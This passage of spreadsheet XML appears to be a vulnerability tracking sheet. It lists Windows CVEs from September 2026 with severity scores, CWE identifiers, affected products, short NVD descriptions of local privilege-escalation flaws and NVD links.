      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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2" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69709</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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5" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69738</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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6" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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7" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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38" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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9" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69900</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K141" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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2" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K143" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70289</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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5" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K146" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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7" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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8" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.002</v>
      </c>
